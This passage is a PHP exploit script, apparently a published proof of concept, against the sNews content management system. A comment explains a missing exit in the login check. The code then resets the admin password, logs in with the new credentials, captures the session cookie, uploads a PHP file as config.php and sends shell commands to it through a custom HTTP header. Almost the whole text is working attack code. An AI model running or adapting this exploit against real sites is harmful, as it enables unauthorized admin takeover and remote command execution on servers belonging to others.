126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $your_ip=$argv[3]; $port=80; $proxy=""; $cmd=""; for ($i=4; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); $tmp=explode(":",$proxy); $your_ip=$tmp[0]; } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} /* software site: http://www.solucija.com/home/snews/ you can have unauthorized access to admin password reset feature and other ones, after that you can upload a php file and launch commands see snews.php near lines 392-395: ... function center() { if (isset($_GET['category'])) {$id = $action = $_GET['category'];} if (isset($_GET['articleid'])) {$articleid = $_GET['articleid'];} if (isset($_POST['submit_text'])) {processing(); $processed = true;} ... now look at processing() function near line 1300: ... function processing() { if ($_SESSION[db('website').'Logged_In'] != 'True') {notification(l('error_not_logged_in'),'','login/');} ... and to notification() one near lines 675-680: ... function notification($error, $errNote, $link) { $errNote = !empty($errNote) ? '
'.$errNote : ''; echo ''.l('admin_error').'

'.$error.$errNote.'

' : '>'.l('operation_completed').''); echo (!empty($link)) ? '

' : ''; } ... funny! there is no exit() or die()... this one reset the admin password and try to upload a php file */ $data='-----------------------------7d61bcd1f033e Content-Disposition: form-data; name="submit_text"; 1 -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="task"; changeup -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="submit_pass"; 1 -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="uname"; suntzu -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="pass1"; suntzu -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="pass2"; suntzu -----------------------------7d61bcd1f033e-- '; $packet ="POST ".$p." HTTP/1.0\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(1); $data ="uname=suntzu"; $data.="&pass=suntzu"; $data.="&Loginform=True"; $data.="&submit=Login"; $packet ="POST ".$p." HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!eregi("Admin",$html)){die("exploit failed...");} $cookie=""; $temp=explode("Set-Cookie: ",$html); for ($i=1; $i ".$cookie."\n"; $data='-----------------------------7d61bcd1f033e Content-Disposition: form-data; name="upload_dir"; . -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="imagefile"; filename="config.php" Content-Type: image/jpeg; -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="ip"; '.$your_ip.' -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="time"; 1 -----------------------------7d61bcd1f033e Content-Disposition: form-data; name="upload"; Upload -----------------------------7d61bcd1f033e-- '; $packet ="POST ".$p."files/ HTTP/1.0\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(1); $packet ="GET ".$p."config.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="SUNTZU: ".$cmd."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("my_delim",$html)) { $temp=explode("my_delim",$html); echo $temp[1]; } else { echo "exploit succeeded... but, for some reason, failed to upload shell, try to login manually with user 'suntzu' & password 'suntzu'"; } ?>